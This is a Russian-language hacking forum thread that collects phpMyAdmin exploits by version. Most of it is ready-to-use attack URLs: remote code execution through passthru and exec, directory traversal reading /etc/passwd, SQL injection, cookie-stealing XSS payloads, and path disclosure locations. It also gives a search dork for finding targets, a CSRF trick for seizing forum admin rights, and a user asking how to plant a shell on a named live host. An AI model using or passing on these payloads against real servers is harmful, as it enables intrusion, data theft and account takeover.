![]() |
[ Обзор уязвимостей phpMyAdmin ]
Vulnerability
2.2.0rc3 http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.hax or2&strCopyTableOK=".passthru('cat%20/etc/passwd')." Эксплоит дает выполнение произвольного кода. 2.3.2 http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION> SQL-injection 2.5.* phpMyAdmin 2.5.7 Remote code injection Exploit Эксплоит дает выполнение произвольного кода. 2.5.5-pl1 and prior http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 Эксплоит дает чтение файла / выполнение произвольного кода. 2.6.4-pl1 phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit Эксплоит дает чтение любого фала. HTML-Exploit: Код HTML:
<CENTER> 2.7.0 http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs=' http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username =1&dbname=1&tablename=1 SQL-injection 2.11.2 SQL-injection + XSS Код:
12 ноября, 2007other: http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00 http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00 http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No XSS (Cross-site Scripting) : 2.6.0-pl2 and prior http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></ http://[target]/[phpMyAdmin_directory]/read_dump .php?sql_query=set%20@1=1&zero_rows=<script>alert( document.cookie)</script> prior to 2.6.2-rc1 http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lan g=en-iso-8859-1&convcharset=\"><sc ript>alert(document.cookie)</script> http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lan g=en-iso-8859-1&convcharset=\"><h1>XSS</h1> 2.8.0.1 http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22 index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E 2.9.x http://site.com/phpmyadmin/sql.php?db=information_schema& token=your_token&goto=db_details_structure.php&tab le=CHARACTER_SETS&pos=[xss] other: Код:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]Full path disclosure : /scripts/check_lang.php /themes/darkblue_orange/layout.inc.php /index.php?lang[]= /index.php?target[]= /index.php?db[]= /index.php?goto[]= /left.php?server[]= /index.php?table[]= /server_databases.php?token=your_token&sort_by=" /index.php?db=information_schema&token=your_token&t bl_group[]= /db_printview.php?db=" /sql.php?back[]= libraries/string.lib.php libraries/storage_engines.lib.php libraries/sqlparser.lib.php libraries/sql_query_form.lib.php libraries/select_theme.lib.php libraries/select_lang.lib.php libraries/relation_cleanup.lib.php libraries/left_header.inc.php libraries/import.lib.php libraries/header_meta_style.inc.php libraries/grab_globals.lib.php libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo) libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&ed it_url=foo) libraries/display_import.lib.php libraries/display_export.lib.php libraries/display_create_table.lib.php libraries/display_create_database.lib.php libraries/db_table_exists.lib.php libraries/database_interface.lib.php libraries/common.lib.php libraries/check_user_privileges.lib.php libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true) libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE) libraries/import/sql.php libraries/fpdf/ufpdf.php libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true) dork: Код:
inurl:main.php phpMyAdminFiles locations Код:
/phpm/phpMyAdmin security announcement |
SQL injection (Delayed Cross Site Request Forgery) <=v2.11.5
Цитата:
У нас имеется сайт на котором стоит phpmyadmin (кстати не особо важно даже где, главное чтоб стоял и админ в него заходил), форум (для примера ipb) и скрипт подверженный активной xss (для примера возьмём теоретическую активку в пм ipb). Отправляем админу кодес с xss (важно знать префикс используемый на форуме). Кодес: PHP код:
4 - админская группа 31337 - наш id на форуме После "заражения" xss'кой админа остаётся только ждать когда он зайдёт в phpmyadmin. Там уже выполняемый админом sql запрос перепишется и сделает нас админом форума (при данном значении параметра sql_query). Для беспалевности можно "поиграть" с параметром expires. PS на данный момент уязвимости подвержены практически все пхпмайадмины (не успели обновиться, бгг)) |
еще пару XSS, в версии 2.6.1 работают, последние версии не уязвимы:
Код:
http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>Код:
http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>register globals и magic qoutes неважны Код:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>поидее и в последних версиях этот скрипт уязвим, но он перенесен в libraries и немного изменен, в 2.11.5 эксплуатируется так: Код:
http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script> |
It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is a example of a small vulnerable php script.
PHP код:
You can now use a thing such the extention for firefox called Cookie Editor, and modify the cookie, you can also do this with javascript. You then edit the cookie's value, it would have been something like "12", but after editing and adding sql code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--". That will change the query, and display the user connected to the database, instead of the name of the user stored in the database. That will result in the following being echo'd; "Hello root@localhost". (c) h4cky0u |
Vulnerable:
Код:
Typo3 phpMyAdmin 3.2 Код:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]Решение: Upgrade to phpMyAdmin 2.11.9.1 or newer. Not Vulnerable: Код:
Typo3 phpMyAdmin 3.3 |
бага разобрана тут
|
Цитата:
|
phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
______________________ http://www.milw0rm.com/exploits/7382 |
2.10.0.2
XSS
[CODE] Код:
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]Код:
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]Код:
http://[server]/server_privileges.php?token=[SID]&username=[XSS]Код:
http://[server]/server_privileges.php?token=[SID]&username=[XSS]Код:
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]Код:
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]Код:
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&Код:
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30& |
Цитата:
Работает на мускуле 4 На 5 - не работает. По крайней мере у меня. ТОлько что протестил.) (хорошо что там где надо стоит 4)))) |
Код:
calendar.php?GLOBALS |
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Код:
#!/bin/bash |
CVE-2009-1151 (phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4
Код:
<?phpphpMyAdmin//config/config.inc.php?p=phpinfo(); Vulnerable software and versions: phpmyadmin:3.1.3 phpmyadmin:3.1.3:rc1 phpmyadmin:3.1.2 phpmyadmin:3.1.2:rc1 phpmyadmin:3.1.1 phpmyadmin:3.1.1:rc1 phpmyadmin:3.1.0 phpmyadmin:2.11.9.3 phpmyadmin:2.11.9.4 phpmyadmin:2.11.9.2 phpmyadmin:2.11.9.1 phpmyadmin:2.11.9.0 phpmyadmin:2.11.9 phpmyadmin:2.11.8 phpmyadmin:2.11.7.12.11.7.1 phpmyadmin:2.11.7.0 phpmyadmin:2.11.7 phpmyadmin:2.11.6:rc1 phpmyadmin:2.11.6.0 phpmyadmin:2.11.6 phpmyadmin:2.11.5:rc1 phpmyadmin:2.11.5.2 phpmyadmin:2.11.5.1 phpmyadmin:2.11.5.0 phpmyadmin:2.11.5 phpmyadmin:2.11.4:rc1 phpmyadmin:2.11.4 phpmyadmin:2.11.3:rc1 phpmyadmin:2.11.3.0 phpmyadmin:2.11.3 phpmyadmin:2.11.2.2 phpmyadmin:2.11.2.1 phpmyadmin:2.11.2.0 phpmyadmin:2.11.2 phpmyadmin:2.11.1:rc1 phpmyadmin:2.11.1.2 phpmyadmin:2.11.1.1 phpmyadmin:2.11.1.0 phpmyadmin:2.11.1 phpmyadmin:2.11.0:rc1 phpmyadmin:2.11.0:beta1 phpmyadmin:2.11.0 |
По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют |
Files locations
Код:
/php-my-admin/ |
По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима.
Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были ( |
Цитата:
PHP код:
|
phpMyAdmin SQL bookmark HTML Injection Vulnerability
Код:
Bugtraq ID: 35543 Код:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E |
как узнать точную версию phpMyAdmin
|
Раскрытие путей
phpMyAdmin 2.6.1 Код:
http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='Код:
Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\lPHP код:
Код:
http://localhost/Tools/phpMyAdmin/footer.inc.phpКод:
Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17PHP код:
Код:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.phpКод:
Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385PHP код:
(C)Xcontrol212 |
Цитата:
Пример: http://87.106.94.86/phpmyadmin/changelog.php |
Цитата:
Цитата:
XSS то они походу заделали, но как всегда получили что то другое, в нашем случае раскрытие путей ;) |
http://tools.hostcommander.net/phpmyadmin/scripts/setup.php
имея такой доступ что можно зделать ? залить шел или слить базу какнибуть можно? |
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
|
Цитата:
Блин, извиняюсь за глупый вопрос: но чем запустить ? под виндой? |
to:Sidarovich1975
Cygwin =) |
#!/bin/bash под виндой :confused: Наврядли :D
|
| Время: 13:15 |